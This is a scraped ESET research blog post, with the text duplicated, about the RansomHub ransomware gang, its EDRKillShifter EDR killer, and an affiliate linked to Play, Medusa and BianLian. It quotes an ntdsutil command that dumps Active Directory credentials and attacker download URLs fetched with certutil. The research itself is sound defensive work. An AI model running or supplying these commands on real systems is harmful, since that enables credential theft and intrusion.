Shifting the sands of RansomHubs EDRKillShifter
p
Awardwinning news views and insight from the ESET security community
pp
Awardwinning news views and insight from the ESET security community
ppESET ResearchppESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa BianLian and PlayppJakub SoučekppJan Holmanpp
26 Mar 2025
25 min read
ppESET researchers take a look back at the significant changes in the ransomware ecosystem in 2024 and focus on the newly emerged and currently dominating ransomwareasaservice RaaS gang RansomHub We share previously unpublished insights into RansomHubs affiliate structure and uncover clear connections between this newly emerged giant and wellestablished gangs Play Medusa and BianLianppWe also emphasize the emerging threat of EDR killers unmasking EDRKillShifter a custom EDR killer developed and maintained by RansomHub We have observed an increase in ransomware affiliates using code derived from publicly available proofs of concept while the set of drivers being abused is largely fixedppFinally based on our observations following the lawenforcementled Operation Cronos and the demise of the infamous BlackCat gang we offer our insights into how to assist in this intensive fight against ransomwareppThe fight against ransomware reached two milestones in 2024 LockBit and BlackCat formerly the top two gangs dropped out of the picture And for the first time since 2022 recorded ransomware payments dropped in particular by a stunning 35 despite reverse expectations in the middle of the year On the other hand the recorded number of victims posted on dedicated leak sites DLSs increased by roughly 15ppA big part of this increase is due to RansomHub a new RaaS gang that emerged around the time of Operation Cronos In this blogpost we look in depth at RansomHub and demonstrate how we leveraged to our advantage the way affiliates use RansomHubs tooling allowing us to draw connections between RansomHub and its rivals including wellestablished ones like Play Medusa and BianLianppThroughout this blogpost we refer to entities forming the ransomwareasaservice model as followsppRansomHub announced its first victim on its DLS see Figure 1 on February 10th 2024 10 days before the public announcement of Operation Cronos While the gangs rise was slow it was also consistent and when in April 2024 RansomHub achieved the most victim postings of all active ransomware groups disregarding LockBit posting fakes it was clear that this was a gang to keep a close eye on Since then RansomHub has dominated the ransomware sceneppTo further demonstrate how dangerous RansomHub is lets compare it to LockBit Figure 2 shows the daily cumulative sum on the yaxis of new victims posted on the DLS of LockBit vs RansomHub starting from RansomHubs appearance in February 2024ppAs you can clearly see while RansomHub started announcing victims more slowly nearly nine months later the gang was able to accumulate more victims since it started than LockBit and that trend continues to this day Considering that both BlackCat and LockBit suffered huge blows right around the time RansomHub emerged we can confidently assume that many skilled affiliates migrated to RansomHub Notchy the BlackCat affiliate who stole more than 4 TB of data from Change Healthcare is just one publicly known exampleppFigure 3 shows the ransom note that RansomHub affiliates leave on their victims machinesppFigure 3 RansomHub ransom noteppJust as any emerging RaaS gang RansomHub needed to attract affiliates and since there is strength in numbers the operators werent very picky The initial advertisement was posted on the Russianspeaking RAMP forum on February 2nd 2024 eight days before the first victims were posted There are a few things to note about the initial announcementppGuarantees like receiving ransom payment directly to the affiliates wallet and keeping a generous 90 certainly sound promising especially in the chaos following the BlackCat and LockBit disruptions Additionally the entry barrier is very low allowing even lowskilled affiliates to try their luckppIt is also worth mentioning that RansomHubs encryptor is not written from scratch but based on repurposed code from Knight a oncerival ransomware gang that sold its source code in February 2024 The affiliates request the encryptor often called a locker by RaaS operators through the web panel offered by RansomHub as is typical for RaaS gangs the component responsible for generating the encryptor is typically referred to as a builder Because information such as the unique victim ID is hardcoded in the encryptor an affiliate needs to request a new one for every victim RansomHubs builder adds an additional layer of protection to its encryptors a 64character password without which the encryptor does not work This password is unique for each sample generated by the builder and known only to the affiliate who requested the encryptorppOn June 21st 2024 RansomHub operators changed the affiliate rules in reaction to an alleged breach by security researchers In response the operator no longer allowed vouching by existing members as sufficient and strictly required a US 5000 deposit for aspiring affiliates This was the last noteworthy message from the RansomHub operators However between the initial announcement and this rule change one more important event happened which we dive into in the next sectionppOn May 8th 2024 the RansomHub operators made a significant update they introduced their own EDR killer a special type of malware designed to terminate blind or crash the security product installed on a vicims system typically by abusing a vulnerable driverppRansomHubs EDR killer named EDRKillShifter by Sophos is a custom tool developed and maintained by the operator EDRKillShifter is offered to RansomHub affiliates through the web panel same as the encryptor it too is protected by a 64character password Functionalitywise it is a typical EDR killer targeting a large variety of security solutions that the RansomHub operators expect to find protecting the networks they aim to breach A notable distinction lies in the code protection the password protects shellcode that acts as a middle layer of the killers execution Without the password security researchers can neither retrieve the list of targeted process names nor the abused vulnerable driverppSophos probably chose shifter in the name to reflect the fact that the abused driver is not always the same at least two different vulnerable drivers abused by other known EDR killers too were observed We dive more in depth into EDRKillShifter and other EDR killers in the EDR killers on the rise sectionppThe decision to implement a killer and offer it to affiliates as part of the RaaS program is rare Affiliates are typically on their own to find ways to evade security products some reuse existing tools while more technically oriented ones modify existing proofs of concept or utilize EDR killers available as a service on the dark web Evidently ransomware affiliates thought this was a good idea because soon after the announcement ESET researchers saw a steep increase in the use of EDRKillShifter and not exclusively in RansomHub cases as we demonstrate in the next sectionppRoughly a month after EDRKillShifters announcement on June 3rd 2024 RansomHub operators posted yet another update stating that they improved EDRKillShifter ESET telemetry shows that some affiliates deployed this updated version only four days laterppESET researchers took advantage of the wide popularity that EDRKillShifter gained upon its launch to expand our research We were able to leverage its usage to associate RansomHub affiliates with the multiple rival gangs that they also work for as well as to retrieve clearer internal versioning of this EDR killerppThe difference between RansomHubs encryptor and EDRKillShifter is that there is no reason for affiliates to build a new sample of EDRKillShifter for every intrusion unless there is a major update which is exactly what allowed us to uncover one of RansomHubs affiliates working for three rival gangs Play Medusa and BianLianppThese three gangs differ significantlyppDiscovering a link between RansomHub and Medusa is not that surprising as it is common knowledge that ransomware affiliates often work for multiple operators simultaneously However we did not expect wellestablished gangs operating under the closed RaaS model meaning that they do not actively look for new recruits and their partnerships are based on longterm mutual trust to form alliances with RansomHub so quickly Other wellestablished gangs in addition to BianLian and Play also operate under the closed RaaS model the recent BlackBasta leak offered unique insight into the inner workings of such groupsppOne way to explain Play and BianLian having access to EDRKillShifter is that they hired the same RansomHub affiliate which is unlikely given the closed nature of both gangs Another more plausible explanation is that trusted members of Play and BianLian are collaborating with rivals even newly emerged ones like RansomHub and then repurposing the tooling they receive from those rivals in their own attacks This is especially interesting since such closed gangs typically employ a rather consistent set of core tools during their intrusions Before diving into the specifics of the discovered overlaps lets briefly introduce the modus operandi of the Play gangppThe Play gang posted the first victims to its DLS on November 26th 2022 the gang has shown steady growth since then In April 2024 Play made it to the top three most active ransomware gangs on the scene and consistently remained in the top 10 for the whole year The gang posts 25 new victims each month on average focusing on SMBs hinting that the gang has at least several experienced loyal affiliates Recently Play has been linked to the North Koreaaligned group AndarielppAs expected from a closed RaaS gang most cases involving the Play encryptor show similarities Typically in such intrusionsppThe remainder of the attack typically employs a wide arsenal of tools as well as livingofftheland techniquesppLets look in depth at the links we discovered We emphasize first the most important ones in Figure 4 and then dive into the details of each of the intrusions We believe with high confidence that all these attacks were performed by the same threat actor working as an affiliate of the four ransomware gangs shown in Figure 4 We are not tracking this threat actor under a dedicated name at this point but for convenience well refer to this threat actor as QuadSwitcherppAs you can see in Figure 4 there are a total of five intrusions from four different ransomware gangs interlinked byppThe following sections go into the individual intrusions in more detailppIn July 2024 QuadSwitcher deployed the RansomHub encryptor along with EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 to a manufacturing company in Western Europe and an automotive company in Central EuropeppIn August QuadSwitcher compromised a governmental institution in North America using PuTTY and shortly after Rclone They proceeded by installing AnyDesk and protecting it with a password via a PowerShell script anydesps1 part of the Conti leaks Attempting to evade the security solution the threat actor deployed EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 and TDSSKillerppAt the end of July 2024 QuadSwitcher compromised a company in the legal sector in North America During that intrusion the threat actor dumped the Active Directory by executingpppowershell ntdsutilexe ac i ntds ifm create full ctemp1 q qppdeployed AnyDesk via the same installation script from the Conti leaks and used Advanced IP Scanner to scan the network Six days later the attacker installed the ScreenConnect and Ammyy Admin remote monitoring and management RMM tools and deployed EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 After almost a month of no activity the attacker returned and downloaded two payloads from http4532206169ppAdditionally QuadSwitcher deployed SystemBC using 4532210151 as its CC server and a signature BianLian backdoor with CC server 92243642006991 from http14915415822233031win641exe The victim was later announced on BianLians DLSppIn early August 2024 QuadSwitcher compromised a manufacturing company in North America They deployed SystemBC with CC 4532210151 EDRKillShifter SHA1 77DAF77D9D2A08CC22981C004689B870F74544B5 and WKTools downloaded from http4532206169WKToolsexe Ultimately the threat actor deployed the Play encryptorppAt the end of August 2024 QuadSwitcher compromised a technology company in Western Europe downloading PuTTY from http130185751988000plinkexe using certutilexe followed by using Process Explorer and EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 The threat actor also downloaded MeshAgent from http7912458130dlgitexe also via certutilexe The victim was later announced on Medusas DLSppBesides the links summarized in Figure 4 there are TTPs that most resemble typical Play intrusions In three of the cases additional malware and tools were downloaded from a root folder of a server accessed via an IP address using HTTP and QuadSwitcher also used SystemBC commodity malware heavily used by the Play gang These links lead us to believe QuadSwitcher is related to Play the closestppAdditionally QuadSwitcher has access to at least two EDRKillShifter samples compiled two months apart signaling the threat actor had extended access to RansomHubs toolingppIn September 2024 ESET researchers documented a case where CosmicBeetle an immature ransomware threat actor using its own signature encryptor ScRansom and the leaked LockBit 30 builder became an affiliate of RansomHub Note that CosmicBeetle is not a gang but an individual distributing and developing various ransomware Following the publication of our findings we observed CosmicBeetle further utilize EDRKillShifter duringppOther immature ransomware affiliates were spotted using EDRKillShifter before deploying their custom encryptors often created simply by using the leaked LockBit 30 builder as well This shows one weakness of RansomHub in its greed to grow as quickly as possible it wasnt very picky about its affiliates As a result it was by its own admission breached by security researchers in June 2024 Additionally immature affiliates tend to leave significantly more trails which enabled us to learn more about both them and RansomHubppIn the blogpost about CosmicBeetle we mentioned EDRKillShifter being deployed from an unusual path CUsersAdministratorMusic108zip In the following months multiple other immature affiliates left similar trails that enabled us to partially reconstruct EDRKillShifters versioning demonstrated in Table 1 The VERSIONINFO column refers to EDRKillShifters version as listed in its VERSIONINFO resource while the Deployment path refers to the version mentioned in the path discovered by ESET telemetryppTable 1 EDRKillShifter versioningppppFollowing July 2024 there was only a single very generic update from the RansomHub operator posted on RAMP correlating with our not seeing new versions of EDRKillShifter in the wild Reconstructing the development timeline of EDRKillShifter also allowed us to spot these development practicesppEDRKillShifter quickly gained popularity among ransomware affiliates and as we just demonstrated they dont use it exclusively in RansomHub intrusions However it is not the only EDR killer out there in fact ESET researchers have observed an increase in the variety of EDR killers used by ransomware affiliatesppAn EDR killer is malware designed to run in a compromised network to blind corrupt crash or terminate security solutions protecting the endpoints The obvious goal is to allow smooth execution of the ransomware encryptor While more immature ransomware affiliates settle with scripts that simply try to terminate a list of processes more sophisticated ones go beyond that and use the technique known as Bring Your Own Vulnerable Driver BYOVDppEDR killers are an effective and increasingly popular addition to ransomware affiliates arsenals During an intrusion the goal of the affiliate is to obtain admin or domain admin privileges Ransomware operators tend not to do major updates of their encryptors too often due to the risk of introducing a flaw that could cause issues ultimately damaging their reputation As a result security vendors detect the encryptors quite well which the affiliates react to by using EDR killers to get rid of the security solution just before executing the encryptorppAdvanced EDR killers consist of two parts a user mode component responsible for orchestration which we will refer to as the killer code and a legitimate but vulnerable driver The execution is typically very straightforward the killer code installs the vulnerable driver typically embedded in its data or resources iterates over a list of process names and issues a command to the vulnerable driver resulting in triggering the vulnerability and killing the process from kernel modeppSophos documented in their blogpost how different builds of EDRKillShifter abuse different vulnerable drivers One of the abused drivers rentdrv2sys is also a part of BadRentdrv2 a publicly available EDR killer The second one TFSysMon from ThreatFire System Monitor is also a part of TFSysMonKiller another publicly available PoC The latter is part of a bigger collection of four EDR killer PoCs written in Rust which we have observed threat actors reimplement in C without changing a single line of codeppWhile the Living Off The Land Drivers project provides over 1700 vulnerable drivers making them a lucrative target for cybercriminals only a handful of these drivers are abused by EDR killers if there is tested code abusing a vulnerability in one of these drivers it is much easier to reuse it without having to design the code from scratch Additionally it allows the EDR killer developers to focus on the killer code and its stealthinessppLegitimate tools are abused by ransomware affiliates to work as EDR killers too Such tools like the GMER rootkit detector and PC Hunter by their nature require access to kernel mode and need to closely inspect the internals of the operating system Unfortunately they also offer a powerful functionality that can be abused when in the hands of malicious threat actorsppRaaS programs often dont provide affiliates only with encryptors additional tools and playbooks may be part of the package For instance LockBit offered Stealbit a custom data exfiltration tool to its affiliates and the Conti leaks and Dispossessor leak disclosed that playbooks scripts and knowhow are also part of the ransomware gangs arsenalppAdding an EDR killer to a RaaS offering seems logical and RansomHub is not the only gang doing that In October 2024 ESET researchers documented that the emerging ransomware gang Embargo implemented its own EDR killer as well called MS4Killer by modifying a publicly available PoC At the time of writing while the group listed only 14 victims on its DLS it had already invested time and resources into developing its own EDR killerppIt remains to be seen whether EDR killers find their place in more gangs offerings However this blogpost has also demonstrated that researchers may leverage their usage to cluster affiliates and discover new relationships between rival gangsppDefending against EDR killers is challenging Threat actors need admin privileges to deploy an EDR killer so ideally their presence should be detected and mitigated before they reach that pointppWhile preventing the killer code from executing is the best approach code obfuscation can make this unreliable However focusing on vulnerable drivers provides additional defense options ESET considers drivers exploited by EDR killers potentially unsafe Therefore users especially in corporate environments should ensure that the detection of potentially unsafe applications is enabled This can prevent the installation of vulnerable driversppAlthough not common sophisticated threat actors may exploit a vulnerable driver already present on a compromised machine instead of relying on BYOVD To counter this having proper patch management in place is an effective and essential defense strategyppThe ransomware ecosystem suffered significant blows in 2024 Despite the overall number of recorded attacks increasing it should not overshadow the positive effect of successfully disrupting or eliminating two ransomware gangs that had been dominating the scene for yearsppWe can speculate about how much the result of law enforcement actions decreased ransomware payments or how the growing awareness and initiatives like the Counter Ransomware Initiative are helping ransomware victims understand that paying the ransom may not be the best way forwardppWhat is clear unfortunately is that a new sophisticated ransomware group RansomHub emerged used the right tactics to attract affiliates many of whom we believe transitioned from BlackCat and LockBit in a short period and was quickly able to climb to the top of the ladder In the foreseeable future RansomHub will surely try to remain among the most active RaaS gangsppLawenforcementled disruptions of RaaS operators have proved effective sowing distrust in the RaaS ecosystem Unfortunately 2024 showed that affiliates are able to regroup fairly quickly After all they have strong financial incentives to deploy encryptors to and exfiltrate sensitive data from their targets Although more difficult to accomplish than disruptions eliminating the most active affiliates from the picture is also effective because it can prevent new RaaS operators from gaining strength as quickly as RansomHub did We believe that focusing on the affiliates especially by tracking down their links between various gangs as demonstrated in this blogpost between RansomHub Play Medusa and BianLian will ultimately lead to identification of the affiliates and their removal from the gameppA comprehensive list of indicators of compromise and samples can be found in our GitHub repositoryppThis table was built using version 16 of the MITRE ATTCK frameworkpppp
Sign up for our newsletters
ppESET ResearchppYou will always remember this as the day you finally caught FamousSparrowppESET ResearchppYou will always remember this as the day you finally caught FamousSparrowppppESET ResearchppOperation FishMedleyppESET ResearchppOperation FishMedleyppppESET ResearchppOperation AkaiRyū MirrorFace invites Europe to Expo 2025 and revives ANEL backdoorppESET ResearchppOperation AkaiRyū MirrorFace invites Europe to Expo 2025 and revives ANEL backdoorppppESET researchppTelekopye transitions to targeting tourists via hotel booking scamppESET researchppEmbargo ransomware RocknRustppESET researchppCosmicBeetle steps up Probation period at RansomHubpp
Awardwinning news views and insight from the ESET security community
p
Awardwinning news views and insight from the ESET security community
pp
Awardwinning news views and insight from the ESET security community
ppESET ResearchppESET researchers discover new ties between affiliates of RansomHub and of rival gangs Medusa BianLian and PlayppJakub SoučekppJan Holmanpp
26 Mar 2025
25 min read
ppESET researchers take a look back at the significant changes in the ransomware ecosystem in 2024 and focus on the newly emerged and currently dominating ransomwareasaservice RaaS gang RansomHub We share previously unpublished insights into RansomHubs affiliate structure and uncover clear connections between this newly emerged giant and wellestablished gangs Play Medusa and BianLianppWe also emphasize the emerging threat of EDR killers unmasking EDRKillShifter a custom EDR killer developed and maintained by RansomHub We have observed an increase in ransomware affiliates using code derived from publicly available proofs of concept while the set of drivers being abused is largely fixedppFinally based on our observations following the lawenforcementled Operation Cronos and the demise of the infamous BlackCat gang we offer our insights into how to assist in this intensive fight against ransomwareppThe fight against ransomware reached two milestones in 2024 LockBit and BlackCat formerly the top two gangs dropped out of the picture And for the first time since 2022 recorded ransomware payments dropped in particular by a stunning 35 despite reverse expectations in the middle of the year On the other hand the recorded number of victims posted on dedicated leak sites DLSs increased by roughly 15ppA big part of this increase is due to RansomHub a new RaaS gang that emerged around the time of Operation Cronos In this blogpost we look in depth at RansomHub and demonstrate how we leveraged to our advantage the way affiliates use RansomHubs tooling allowing us to draw connections between RansomHub and its rivals including wellestablished ones like Play Medusa and BianLianppThroughout this blogpost we refer to entities forming the ransomwareasaservice model as followsppRansomHub announced its first victim on its DLS see Figure 1 on February 10th 2024 10 days before the public announcement of Operation Cronos While the gangs rise was slow it was also consistent and when in April 2024 RansomHub achieved the most victim postings of all active ransomware groups disregarding LockBit posting fakes it was clear that this was a gang to keep a close eye on Since then RansomHub has dominated the ransomware sceneppTo further demonstrate how dangerous RansomHub is lets compare it to LockBit Figure 2 shows the daily cumulative sum on the yaxis of new victims posted on the DLS of LockBit vs RansomHub starting from RansomHubs appearance in February 2024ppAs you can clearly see while RansomHub started announcing victims more slowly nearly nine months later the gang was able to accumulate more victims since it started than LockBit and that trend continues to this day Considering that both BlackCat and LockBit suffered huge blows right around the time RansomHub emerged we can confidently assume that many skilled affiliates migrated to RansomHub Notchy the BlackCat affiliate who stole more than 4 TB of data from Change Healthcare is just one publicly known exampleppFigure 3 shows the ransom note that RansomHub affiliates leave on their victims machinesppFigure 3 RansomHub ransom noteppJust as any emerging RaaS gang RansomHub needed to attract affiliates and since there is strength in numbers the operators werent very picky The initial advertisement was posted on the Russianspeaking RAMP forum on February 2nd 2024 eight days before the first victims were posted There are a few things to note about the initial announcementppGuarantees like receiving ransom payment directly to the affiliates wallet and keeping a generous 90 certainly sound promising especially in the chaos following the BlackCat and LockBit disruptions Additionally the entry barrier is very low allowing even lowskilled affiliates to try their luckppIt is also worth mentioning that RansomHubs encryptor is not written from scratch but based on repurposed code from Knight a oncerival ransomware gang that sold its source code in February 2024 The affiliates request the encryptor often called a locker by RaaS operators through the web panel offered by RansomHub as is typical for RaaS gangs the component responsible for generating the encryptor is typically referred to as a builder Because information such as the unique victim ID is hardcoded in the encryptor an affiliate needs to request a new one for every victim RansomHubs builder adds an additional layer of protection to its encryptors a 64character password without which the encryptor does not work This password is unique for each sample generated by the builder and known only to the affiliate who requested the encryptorppOn June 21st 2024 RansomHub operators changed the affiliate rules in reaction to an alleged breach by security researchers In response the operator no longer allowed vouching by existing members as sufficient and strictly required a US 5000 deposit for aspiring affiliates This was the last noteworthy message from the RansomHub operators However between the initial announcement and this rule change one more important event happened which we dive into in the next sectionppOn May 8th 2024 the RansomHub operators made a significant update they introduced their own EDR killer a special type of malware designed to terminate blind or crash the security product installed on a vicims system typically by abusing a vulnerable driverppRansomHubs EDR killer named EDRKillShifter by Sophos is a custom tool developed and maintained by the operator EDRKillShifter is offered to RansomHub affiliates through the web panel same as the encryptor it too is protected by a 64character password Functionalitywise it is a typical EDR killer targeting a large variety of security solutions that the RansomHub operators expect to find protecting the networks they aim to breach A notable distinction lies in the code protection the password protects shellcode that acts as a middle layer of the killers execution Without the password security researchers can neither retrieve the list of targeted process names nor the abused vulnerable driverppSophos probably chose shifter in the name to reflect the fact that the abused driver is not always the same at least two different vulnerable drivers abused by other known EDR killers too were observed We dive more in depth into EDRKillShifter and other EDR killers in the EDR killers on the rise sectionppThe decision to implement a killer and offer it to affiliates as part of the RaaS program is rare Affiliates are typically on their own to find ways to evade security products some reuse existing tools while more technically oriented ones modify existing proofs of concept or utilize EDR killers available as a service on the dark web Evidently ransomware affiliates thought this was a good idea because soon after the announcement ESET researchers saw a steep increase in the use of EDRKillShifter and not exclusively in RansomHub cases as we demonstrate in the next sectionppRoughly a month after EDRKillShifters announcement on June 3rd 2024 RansomHub operators posted yet another update stating that they improved EDRKillShifter ESET telemetry shows that some affiliates deployed this updated version only four days laterppESET researchers took advantage of the wide popularity that EDRKillShifter gained upon its launch to expand our research We were able to leverage its usage to associate RansomHub affiliates with the multiple rival gangs that they also work for as well as to retrieve clearer internal versioning of this EDR killerppThe difference between RansomHubs encryptor and EDRKillShifter is that there is no reason for affiliates to build a new sample of EDRKillShifter for every intrusion unless there is a major update which is exactly what allowed us to uncover one of RansomHubs affiliates working for three rival gangs Play Medusa and BianLianppThese three gangs differ significantlyppDiscovering a link between RansomHub and Medusa is not that surprising as it is common knowledge that ransomware affiliates often work for multiple operators simultaneously However we did not expect wellestablished gangs operating under the closed RaaS model meaning that they do not actively look for new recruits and their partnerships are based on longterm mutual trust to form alliances with RansomHub so quickly Other wellestablished gangs in addition to BianLian and Play also operate under the closed RaaS model the recent BlackBasta leak offered unique insight into the inner workings of such groupsppOne way to explain Play and BianLian having access to EDRKillShifter is that they hired the same RansomHub affiliate which is unlikely given the closed nature of both gangs Another more plausible explanation is that trusted members of Play and BianLian are collaborating with rivals even newly emerged ones like RansomHub and then repurposing the tooling they receive from those rivals in their own attacks This is especially interesting since such closed gangs typically employ a rather consistent set of core tools during their intrusions Before diving into the specifics of the discovered overlaps lets briefly introduce the modus operandi of the Play gangppThe Play gang posted the first victims to its DLS on November 26th 2022 the gang has shown steady growth since then In April 2024 Play made it to the top three most active ransomware gangs on the scene and consistently remained in the top 10 for the whole year The gang posts 25 new victims each month on average focusing on SMBs hinting that the gang has at least several experienced loyal affiliates Recently Play has been linked to the North Koreaaligned group AndarielppAs expected from a closed RaaS gang most cases involving the Play encryptor show similarities Typically in such intrusionsppThe remainder of the attack typically employs a wide arsenal of tools as well as livingofftheland techniquesppLets look in depth at the links we discovered We emphasize first the most important ones in Figure 4 and then dive into the details of each of the intrusions We believe with high confidence that all these attacks were performed by the same threat actor working as an affiliate of the four ransomware gangs shown in Figure 4 We are not tracking this threat actor under a dedicated name at this point but for convenience well refer to this threat actor as QuadSwitcherppAs you can see in Figure 4 there are a total of five intrusions from four different ransomware gangs interlinked byppThe following sections go into the individual intrusions in more detailppIn July 2024 QuadSwitcher deployed the RansomHub encryptor along with EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 to a manufacturing company in Western Europe and an automotive company in Central EuropeppIn August QuadSwitcher compromised a governmental institution in North America using PuTTY and shortly after Rclone They proceeded by installing AnyDesk and protecting it with a password via a PowerShell script anydesps1 part of the Conti leaks Attempting to evade the security solution the threat actor deployed EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 and TDSSKillerppAt the end of July 2024 QuadSwitcher compromised a company in the legal sector in North America During that intrusion the threat actor dumped the Active Directory by executingpppowershell ntdsutilexe ac i ntds ifm create full ctemp1 q qppdeployed AnyDesk via the same installation script from the Conti leaks and used Advanced IP Scanner to scan the network Six days later the attacker installed the ScreenConnect and Ammyy Admin remote monitoring and management RMM tools and deployed EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 After almost a month of no activity the attacker returned and downloaded two payloads from http4532206169ppAdditionally QuadSwitcher deployed SystemBC using 4532210151 as its CC server and a signature BianLian backdoor with CC server 92243642006991 from http14915415822233031win641exe The victim was later announced on BianLians DLSppIn early August 2024 QuadSwitcher compromised a manufacturing company in North America They deployed SystemBC with CC 4532210151 EDRKillShifter SHA1 77DAF77D9D2A08CC22981C004689B870F74544B5 and WKTools downloaded from http4532206169WKToolsexe Ultimately the threat actor deployed the Play encryptorppAt the end of August 2024 QuadSwitcher compromised a technology company in Western Europe downloading PuTTY from http130185751988000plinkexe using certutilexe followed by using Process Explorer and EDRKillShifter SHA1 BF84712C5314DF2AA851B8D4356EA51A9AD50257 The threat actor also downloaded MeshAgent from http7912458130dlgitexe also via certutilexe The victim was later announced on Medusas DLSppBesides the links summarized in Figure 4 there are TTPs that most resemble typical Play intrusions In three of the cases additional malware and tools were downloaded from a root folder of a server accessed via an IP address using HTTP and QuadSwitcher also used SystemBC commodity malware heavily used by the Play gang These links lead us to believe QuadSwitcher is related to Play the closestppAdditionally QuadSwitcher has access to at least two EDRKillShifter samples compiled two months apart signaling the threat actor had extended access to RansomHubs toolingppIn September 2024 ESET researchers documented a case where CosmicBeetle an immature ransomware threat actor using its own signature encryptor ScRansom and the leaked LockBit 30 builder became an affiliate of RansomHub Note that CosmicBeetle is not a gang but an individual distributing and developing various ransomware Following the publication of our findings we observed CosmicBeetle further utilize EDRKillShifter duringppOther immature ransomware affiliates were spotted using EDRKillShifter before deploying their custom encryptors often created simply by using the leaked LockBit 30 builder as well This shows one weakness of RansomHub in its greed to grow as quickly as possible it wasnt very picky about its affiliates As a result it was by its own admission breached by security researchers in June 2024 Additionally immature affiliates tend to leave significantly more trails which enabled us to learn more about both them and RansomHubppIn the blogpost about CosmicBeetle we mentioned EDRKillShifter being deployed from an unusual path CUsersAdministratorMusic108zip In the following months multiple other immature affiliates left similar trails that enabled us to partially reconstruct EDRKillShifters versioning demonstrated in Table 1 The VERSIONINFO column refers to EDRKillShifters version as listed in its VERSIONINFO resource while the Deployment path refers to the version mentioned in the path discovered by ESET telemetryppTable 1 EDRKillShifter versioningppppFollowing July 2024 there was only a single very generic update from the RansomHub operator posted on RAMP correlating with our not seeing new versions of EDRKillShifter in the wild Reconstructing the development timeline of EDRKillShifter also allowed us to spot these development practicesppEDRKillShifter quickly gained popularity among ransomware affiliates and as we just demonstrated they dont use it exclusively in RansomHub intrusions However it is not the only EDR killer out there in fact ESET researchers have observed an increase in the variety of EDR killers used by ransomware affiliatesppAn EDR killer is malware designed to run in a compromised network to blind corrupt crash or terminate security solutions protecting the endpoints The obvious goal is to allow smooth execution of the ransomware encryptor While more immature ransomware affiliates settle with scripts that simply try to terminate a list of processes more sophisticated ones go beyond that and use the technique known as Bring Your Own Vulnerable Driver BYOVDppEDR killers are an effective and increasingly popular addition to ransomware affiliates arsenals During an intrusion the goal of the affiliate is to obtain admin or domain admin privileges Ransomware operators tend not to do major updates of their encryptors too often due to the risk of introducing a flaw that could cause issues ultimately damaging their reputation As a result security vendors detect the encryptors quite well which the affiliates react to by using EDR killers to get rid of the security solution just before executing the encryptorppAdvanced EDR killers consist of two parts a user mode component responsible for orchestration which we will refer to as the killer code and a legitimate but vulnerable driver The execution is typically very straightforward the killer code installs the vulnerable driver typically embedded in its data or resources iterates over a list of process names and issues a command to the vulnerable driver resulting in triggering the vulnerability and killing the process from kernel modeppSophos documented in their blogpost how different builds of EDRKillShifter abuse different vulnerable drivers One of the abused drivers rentdrv2sys is also a part of BadRentdrv2 a publicly available EDR killer The second one TFSysMon from ThreatFire System Monitor is also a part of TFSysMonKiller another publicly available PoC The latter is part of a bigger collection of four EDR killer PoCs written in Rust which we have observed threat actors reimplement in C without changing a single line of codeppWhile the Living Off The Land Drivers project provides over 1700 vulnerable drivers making them a lucrative target for cybercriminals only a handful of these drivers are abused by EDR killers if there is tested code abusing a vulnerability in one of these drivers it is much easier to reuse it without having to design the code from scratch Additionally it allows the EDR killer developers to focus on the killer code and its stealthinessppLegitimate tools are abused by ransomware affiliates to work as EDR killers too Such tools like the GMER rootkit detector and PC Hunter by their nature require access to kernel mode and need to closely inspect the internals of the operating system Unfortunately they also offer a powerful functionality that can be abused when in the hands of malicious threat actorsppRaaS programs often dont provide affiliates only with encryptors additional tools and playbooks may be part of the package For instance LockBit offered Stealbit a custom data exfiltration tool to its affiliates and the Conti leaks and Dispossessor leak disclosed that playbooks scripts and knowhow are also part of the ransomware gangs arsenalppAdding an EDR killer to a RaaS offering seems logical and RansomHub is not the only gang doing that In October 2024 ESET researchers documented that the emerging ransomware gang Embargo implemented its own EDR killer as well called MS4Killer by modifying a publicly available PoC At the time of writing while the group listed only 14 victims on its DLS it had already invested time and resources into developing its own EDR killerppIt remains to be seen whether EDR killers find their place in more gangs offerings However this blogpost has also demonstrated that researchers may leverage their usage to cluster affiliates and discover new relationships between rival gangsppDefending against EDR killers is challenging Threat actors need admin privileges to deploy an EDR killer so ideally their presence should be detected and mitigated before they reach that pointppWhile preventing the killer code from executing is the best approach code obfuscation can make this unreliable However focusing on vulnerable drivers provides additional defense options ESET considers drivers exploited by EDR killers potentially unsafe Therefore users especially in corporate environments should ensure that the detection of potentially unsafe applications is enabled This can prevent the installation of vulnerable driversppAlthough not common sophisticated threat actors may exploit a vulnerable driver already present on a compromised machine instead of relying on BYOVD To counter this having proper patch management in place is an effective and essential defense strategyppThe ransomware ecosystem suffered significant blows in 2024 Despite the overall number of recorded attacks increasing it should not overshadow the positive effect of successfully disrupting or eliminating two ransomware gangs that had been dominating the scene for yearsppWe can speculate about how much the result of law enforcement actions decreased ransomware payments or how the growing awareness and initiatives like the Counter Ransomware Initiative are helping ransomware victims understand that paying the ransom may not be the best way forwardppWhat is clear unfortunately is that a new sophisticated ransomware group RansomHub emerged used the right tactics to attract affiliates many of whom we believe transitioned from BlackCat and LockBit in a short period and was quickly able to climb to the top of the ladder In the foreseeable future RansomHub will surely try to remain among the most active RaaS gangsppLawenforcementled disruptions of RaaS operators have proved effective sowing distrust in the RaaS ecosystem Unfortunately 2024 showed that affiliates are able to regroup fairly quickly After all they have strong financial incentives to deploy encryptors to and exfiltrate sensitive data from their targets Although more difficult to accomplish than disruptions eliminating the most active affiliates from the picture is also effective because it can prevent new RaaS operators from gaining strength as quickly as RansomHub did We believe that focusing on the affiliates especially by tracking down their links between various gangs as demonstrated in this blogpost between RansomHub Play Medusa and BianLian will ultimately lead to identification of the affiliates and their removal from the gameppA comprehensive list of indicators of compromise and samples can be found in our GitHub repositoryppThis table was built using version 16 of the MITRE ATTCK frameworkpppp
Sign up for our newsletters
